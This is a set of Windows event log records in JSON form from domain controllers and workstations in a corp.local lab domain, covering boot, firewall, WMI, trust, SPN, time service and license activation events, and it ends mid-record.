{"EventTime":"2021-09-21T13:02:59.250842+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4696,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13312,"OpcodeValue":0,"RecordNumber":3555505,"ExecutionProcessID":4,"ExecutionThreadID":32,"Channel":"Security","Message":"A primary token was assigned to process.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x4\r\n\tProcess Name:\t\r\n\r\nTarget Process:\r\n\tTarget Process ID:\t0x58\r\n\tTarget Process Name:\tRegistry\r\n\r\nNew Token Information:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7","Category":"Process Creation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-0-0","TargetUserName":"-","TargetDomainName":"-","TargetLogonId":"0x3e7","TargetProcessId":"0x58","TargetProcessName":"Registry","ProcessId":"0x4","EventReceivedTime":"2021-09-21T13:03:48.111868+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.291962+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":51046,"SourceName":"Microsoft-Windows-DHCPv6-Client","ProviderGuid":"{6A1F2B00-6A90-4C38-95A5-5CAB3B056778}","Version":0,"TaskValue":4,"OpcodeValue":62,"RecordNumber":170013,"ExecutionProcessID":1144,"ExecutionThreadID":1300,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv6 client service is started","Category":"Service State Event","Opcode":"ServiceStart","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:17.139092+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4608,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12288,"OpcodeValue":0,"RecordNumber":3555517,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"Windows is starting up.\r\n\r\nThis event is logged when LSASS.EXE starts and the auditing subsystem is initialized.","Category":"Security State Change","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:19.274697+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4902,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":3555533,"ExecutionProcessID":628,"ExecutionThreadID":688,"Channel":"Security","Message":"The Per-user audit policy table was created.\r\n\r\nNumber of Elements:\t0\r\nPolicy ID:\t0x990A","Category":"Audit Policy Change","Opcode":"Info","PuaCount":"0","PuaPolicyId":"0x990a","EventReceivedTime":"2021-09-21T13:03:48.261636+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.592040+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4944,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":876622,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"The following policy was active when the Windows Firewall started.\r\n\r\nGroup Policy Applied:\tNo\r\nProfile Used:\tPublic\r\nOperational mode:\tOn\r\nAllow Remote Administration:\tDisabled\r\nAllow Unicast Responses to Multicast/Broadcast Traffic:\tEnabled\r\nSecurity Logging:\r\n\tLog Dropped Packets:\tDisabled\r\n\tLog Successful Connections:\tDisabled","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","GroupPolicyApplied":"No","Profile":"Public","OperationMode":"On","RemoteAdminEnabled":"Disabled","MulticastFlowsEnabled":"Enabled","LogDroppedPacketsEnabled":"Disabled","LogSuccessfulConnectionsEnabled":"Disabled","EventReceivedTime":"2021-09-21T13:03:42.669033+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.654252+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5024,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":877084,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"The Windows Firewall service started successfully.","Category":"Other System Events","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:42.997164+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.905672+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4956,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":877106,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":748,"Channel":"Security","Message":"Windows Firewall changed the active profile.\r\n\r\nNew Active Profile:\tPrivate","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ActiveProfile":"Private","EventReceivedTime":"2021-09-21T13:03:43.012785+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:15:36.981638+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":129,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56206,"ExecutionProcessID":1212,"ExecutionThreadID":1372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 30 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)","Opcode":"Info","EventData.Name":"TMP_EVENT_DOMAIN_PEER_DISCOVERY_ERROR","ErrorMessage":"The entry is not found. (0x800706E1)","RetryMinutes":"30","EventReceivedTime":"2021-09-21T15:15:38.088923+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.422542+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5617,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":153453,"ExecutionProcessID":540,"ExecutionThreadID":2704,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation Service subsystems initialized successfully","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.690653+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5859,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":9834,"ActivityID":"{63A5CF36-AEB8-0000-86D3-A563B8AED701}","ExecutionProcessID":540,"ExecutionThreadID":4220,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = //./root/CIMV2; NotificationQuery = select * from MSFT_SCMEventLogEvent; OwnerName = S-1-5-32-544; HostProcessID = 540; Provider= SCM Event Provider, queryID = 0; PossibleCause = Permanent","Opcode":"Info","Operation_EssStarted.NamespaceName":"//./root/CIMV2","Operation_EssStarted.Query":"select * from MSFT_SCMEventLogEvent","Operation_EssStarted.User":"S-1-5-32-544","Operation_EssStarted.Processid":"540","Operation_EssStarted.Provider":"SCM Event Provider","Operation_EssStarted.queryid":"0","Operation_EssStarted.PossibleCause":"Permanent","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.664910+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5861,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":9832,"ExecutionProcessID":540,"ExecutionThreadID":4220,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = //./root/subscription; Eventfilter = SCM Event Log Filter (refer to its activate eventid:5859); Consumer = NTEventLogEventConsumer=\"SCM Event Log Consumer\"; PossibleCause = Binding EventFilter: \ninstance of __EventFilter\n{\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventNamespace = \"root\\\\cimv2\";\n\tName = \"SCM Event Log Filter\";\n\tQuery = \"select * from MSFT_SCMEventLogEvent\";\n\tQueryLanguage = \"WQL\";\n};\nPerm. Consumer: \ninstance of NTEventLogEventConsumer\n{\n\tCategory = 0;\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventType = 1;\n\tName = \"SCM Event Log Consumer\";\n\tNameOfUserSIDProperty = \"sid\";\n\tSourceName = \"Service Control Manager\";\n};\n","Opcode":"Info","Operation_ESStoConsumerBinding.Namespace":"//./root/subscription","Operation_ESStoConsumerBinding.ESS":"SCM Event Log Filter","Operation_ESStoConsumerBinding.CONSUMER":"NTEventLogEventConsumer=\"SCM Event Log Consumer\"","Operation_ESStoConsumerBinding.PossibleCause":"Binding EventFilter: \ninstance of __EventFilter\n{\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventNamespace = \"root\\\\cimv2\";\n\tName = \"SCM Event Log Filter\";\n\tQuery = \"select * from MSFT_SCMEventLogEvent\";\n\tQueryLanguage = \"WQL\";\n};\nPerm. 
Consumer: \ninstance of NTEventLogEventConsumer\n{\n\tCategory = 0;\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventType = 1;\n\tName = \"SCM Event Log Consumer\";\n\tNameOfUserSIDProperty = \"sid\";\n\tSourceName = \"Service Control Manager\";\n};\n","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:41.777258+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14531,"SourceName":"Microsoft-Windows-DfsSvc","ProviderGuid":"{7DA4FE0E-FD42-4708-9AA5-89B77A224885}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170057,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"DFS server has finished initializing.","EventData.Name":"DfsFinishInit","EventReceivedTime":"2021-09-21T13:03:50.767600+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:41.574184+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14533,"SourceName":"Microsoft-Windows-DfsSvc","ProviderGuid":"{7DA4FE0E-FD42-4708-9AA5-89B77A224885}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170056,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"DFS has finished building all namespaces.","EventData.Name":"DfsFinishBuildingNamespace","EventReceivedTime":"2021-09-21T13:03:50.767600+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:43.636633+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10148,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170064,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The WinRM service is listening for WS-Management requests. \r\n\r\n User Action \r\n Use the following command to see the specific IPs on which WinRM is listening: \r\n\r\n winrm enumerate winrm/config/listener","Opcode":"Info","EventData.Name":"Started Listening","EventReceivedTime":"2021-09-21T13:03:50.873269+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.430836+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4724,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":3556112,"ExecutionProcessID":628,"ExecutionThreadID":4432,"Channel":"Security","Message":"An attempt was made to reset an account's password.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC02$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1665892435-703704035-3405442920-1103\r\n\tAccount Name:\t\tCORP$\r\n\tAccount Domain:\t\tPROD","Category":"User Account Management","Opcode":"Info","TargetUserName":"CORP$","TargetDomainName":"PROD","TargetSid":"S-1-5-21-1665892435-703704035-3405442920-1103","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC02$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","EventReceivedTime":"2021-09-21T13:03:54.339755+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.581519+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4716,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13569,"OpcodeValue":0,"RecordNumber":3556116,"ExecutionProcessID":628,"ExecutionThreadID":4432,"Channel":"Security","Message":"Trusted domain information was modified.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTrusted Domain:\r\n\tDomain Name:\t\t-\r\n\tDomain ID:\t\tS-1-5-21-2569713578-3403938347-3732993993\r\n\r\nNew Trust Information:\r\n\tTrust Type:\t\t2\r\n\tTrust Direction:\t\t3\r\n\tTrust Attributes:\t\t32\r\n\tSID Filtering:\t\t-","Category":"Authentication Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-7","SubjectUserName":"ANONYMOUS LOGON","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e6","DomainName":"-","DomainSid":"S-1-5-21-2569713578-3403938347-3732993993","TdoType":"2","TdoDirection":"3","TdoAttributes":"32","SidFilteringEnabled":"-","EventReceivedTime":"2021-09-21T13:03:54.371008+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.157746+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10154,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170078,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The WinRM service failed to create the following SPNs: WSMAN/DC02.prod.corp.local; WSMAN/DC02. \r\n\r\n Additional Data \r\n The error received was 1355: %%1355.\r\n\r\n User Action \r\n The SPNs can be created by an administrator using setspn.exe utility.","Opcode":"Info","spn1":"WSMAN/DC02.prod.corp.local","spn2":"WSMAN/DC02","error":"1355","EventReceivedTime":"2021-09-21T13:03:53.285783+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T20:52:58.298621+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":108984,"ExecutionProcessID":912,"ExecutionThreadID":1288,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from DC01.corp.local (ntp.d|0.0.0.0:123->192.168.2.47:123).","Opcode":"Info","TimeSource":"DC01.corp.local (ntp.d|0.0.0.0:123->192.168.2.47:123)","EventReceivedTime":"2021-09-21T20:52:59.495977+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:05.497497+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5792,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170094,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Site 'MAIN' does not have any LDAP servers for non-domain NC 'DomainDnsZones.prod.corp.local'. LDAP servers in site 'PROD' have been automatically selected to cover site 'MAIN' for non-domain NC 'DomainDnsZones.prod.corp.local' based on configured Directory Server replication costs.","Opcode":"Info","Data":"PROD","Data_1":"MAIN","Data_2":"DomainDnsZones.prod.corp.local","EventReceivedTime":"2021-09-21T13:04:06.528261+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:05.451272+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5784,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170093,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Site 'MAIN' does not have any Domain Controllers for domain 'PROD'. Domain Controllers in site 'PROD' have been automatically selected to cover site 'MAIN' for domain 'PROD' based on configured Directory Server replication costs.","Opcode":"Info","Data":"PROD","Data_1":"MAIN","Data_2":"PROD","EventReceivedTime":"2021-09-21T13:04:06.528261+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:15.184188+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":139,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170097,"ExecutionProcessID":1044,"ExecutionThreadID":4192,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a time source.","Opcode":"Info","EventData.Name":"TMP_EVENT_START_ADVERTISING","EventReceivedTime":"2021-09-21T13:04:16.247159+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:24.795379+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5136,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14081,"OpcodeValue":0,"RecordNumber":3556241,"ExecutionProcessID":628,"ExecutionThreadID":736,"Channel":"Security","Message":"A directory service object was modified.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x62956\r\n\r\nDirectory Service:\r\n\tName:\tprod.corp.local\r\n\tType:\tActive Directory Domain Services\r\n\t\r\nObject:\r\n\tDN:\tCN=DC02,OU=Domain Controllers,DC=prod,DC=CORP,DC=local\r\n\tGUID:\t{66cb3374-4b66-4fce-9e64-8202e19faa45}\r\n\tClass:\tcomputer\r\n\t\r\nAttribute:\r\n\tLDAP Display Name:\tservicePrincipalName\r\n\tSyntax (OID):\t2.5.5.12\r\n\tValue:\tTERMSRV/DC02.prod.corp.local\r\n\t\r\nOperation:\r\n\tType:\tValue Added\r\n\tCorrelation ID:\t{1075208c-8a0e-4290-8c46-48e77af9d933}\r\n\tApplication Correlation ID:\t-","Category":"Directory Service Changes","Opcode":"Info","OpCorrelationID":"{1075208c-8a0e-4290-8c46-48e77af9d933}","AppCorrelationID":"-","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x62956","DSName":"prod.corp.local","DSType":"%%14676","ObjectDN":"CN=DC02,OU=Domain Controllers,DC=prod,DC=CORP,DC=local","ObjectGUID":"{66cb3374-4b66-4fce-9e64-8202e19faa45}","ObjectClass":"computer","AttributeLDAPDisplayName":"servicePrincipalName","AttributeSyntaxOID":"2.5.5.12","AttributeValue":"TERMSRV/DC02.prod.corp.local","OperationType":"%%14674","EventReceivedTime":"2021-09-21T13:04:25.606632+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:08:52.869680+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":8200,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109868,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"License acquisition failure details. \r\nhr=0x80072F8F","Data":"hr=0x80072F8F","Data_1":"00010001(0x00000000, 13:08:51:751 - https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail)\n00020001(0x00000000, 13:08:51:767)\n00030001(0x00000000, 13:08:51:767 - https://activation-v2.sls.microsoft.com)\n00030002(0x00000000, 13:08:51:767 - 0)\n00040001(0x00000000, 13:08:51:767 - https://activation-v2.sls.microsoft.com)\n00040002(0x00000000, 13:08:51:767 - 1, <NULL>, <NULL>, <NULL>)\n00050002(0x80072F94, 13:08:51:767 - 0, 1)\n00040006(0x00000001, 13:08:51:767 - 0, https://activation-v2.sls.microsoft.com, <N/A>, <N/A>)\n00020005(0x00000000, 13:08:51:767 - 0)\n00020008(0x80072F8F, 13:08:52:854 - SOAPAction: \"http://microsoft.com/SL/ProductActivationService/IssueToken\"\nContent-Type: text/xml; charset=utf-8\n, <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\"><soap:Body><RequestSecurityToken xmlns=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\"><TokenType>ProductActivation</TokenType><RequestType>http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue</RequestType><UseKey><Values xmlns:q1=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\" 
soapenc:arrayType=\"q1:TokenEntry[1]\"><TokenEntry><Name>PublishLicense</Name><Value>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</Value></TokenEntry></Values></UseKey><Claims><Values xmlns:q1=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\" soapenc:arrayType=\"q1:TokenEntry[17]\"><TokenEntry><Name>SessionKey</Name><Value>NrQ883VaozIQCcS1YCGswK/wDLbBtdWkPZgRC+5BZ9U8vyVjjU1H/4bW1M1I840SSOtoqa/Fx2b8nSku/9PuU9zbUXcXegLDa7hrJE5FJuZ9R5eaoSqUlU4rTV7ryC7HwSm/TDe+uetdEvMhZjh715duEhOKqSqopPRomIUNLm9bXpuQCFKhrfc95s3Qd9WIhyrZpJR8Uh5en7w5j/1+jJ0fN8qVNztGGniMri6k9I7BWx98oD7BwCLriqhhX72dMeGgN8mmlnF72oiCEhhN5TDufHMrG58D3qAdQFg4aOVqDpMpHXSNqO1FJXpB/LFue22wdDFFgbEF7YWb/aAPUg==</Value></TokenEntry><TokenEntry><Name>BindingType</Name><Value>3+WNUl/E04Vxt+Mky92FJIKmI0oBpRDCjXZQv7ABor0=</Value></TokenEntry><TokenEntry><Name>Binding</Name><Value>j6X9dwRwVXiWP0SZZSfpoKVORxNTXt4ZStyiU8h/Cz136XxpX3+G15hl8C5V0q+c7UWPDiAthEyLRludjH9fTQ==</Value></TokenEntry><TokenEntry><Name>ProductKey</Name><Value>JFQObmITLhLRaiU7jTq6L8c6llzFZunxfaRGUCYy1tQ=</Value></TokenEntry><TokenEntry><Name>ProductKeyType</Name><Value>3+WNUl/E04Vxt+Mky92FJCJAXuil1lie4VlRrwqcByA=</Value></TokenEntry><TokenEntry><Name>ProductKeyActConfigId</Name><Value>55dRYEeFXHYg2vxP0rmgJHntYJzsSL5828qCxbTjY2WLVdXKfrXsltOWxBkQXTA8ADNRwGX9AsqJTc3ZXrfxmRv8X1JFnctGSUFUzWt4Qo0=</Value></TokenEntry><TokenEntry><Name>SppSvcVersion</Name><Value>ia0fbL/642yKlTaqeZGb7g==</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.licenseCategory</Name><Value>x6ElrCbLp/HSvXxANTXfFeV8Oqft1VSUXpnK5AKscw8=</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.licenseCategory</Name><Value>x6ElrCbLp/HSvXxANTXfFQSmISAvOgFmssmZydnJVTw=</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.sysprepAction</Name><Value>dgO3TBrhjZhtnPAwWTSJeA==</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.sysprepAction</Name><Value>dgO3TBrhjZhtnPAwWTSJeA==</Value></TokenEntry><TokenEntry><Name>ClientInformation</Name><Value>jiN/BhnOwfjjdBUYEfvVU54cfM9ZF
rSNuk6DpLgYMdeHRKaMmHDEWtbnPOsPJbXOuypSsqYC6gpj4LfknpILLQ==</Value></TokenEntry><TokenEntry><Name>ReferralInformation</Name><Value>XKpZy/ucsFxDSEPnGsTq19XdzywowGc8MNY6JwJfi+IwWNi52rvllr8gOP1c3DSe/Jg98SJdeas1biag5jhgNA==</Value></TokenEntry><TokenEntry><Name>ClientSystemTime</Name><Value>SNtd3xTDBT+McfeNOwdZJ6rnC54VBQgRp55s1kn0EdE=</Value></TokenEntry><TokenEntry><Name>ClientSystemTimeUtc</Name><Value>SNtd3xTDBT+McfeNOwdZJ6rnC54VBQgRp55s1kn0EdE=</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.secureStoreId</Name><Value>EWYgPA6OrzEgVvpKCJWCKOhwo1pTUXgNrdA0B0oEMDvUvsmkZagti6n7JDPedqCs</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.secureStoreId</Name><Value>EWYgPA6OrzEgVvpKCJWCKOhwo1pTUXgNrdA0B0oEMDvUvsmkZagti6n7JDPedqCs</Value></TokenEntry></Values></Claims></RequestSecurityToken></soap:Body></soap:Envelope>)\n00010002(0x80072F8F, 13:08:52:869 - <NULL>)\n00010003(0x80072F8F, 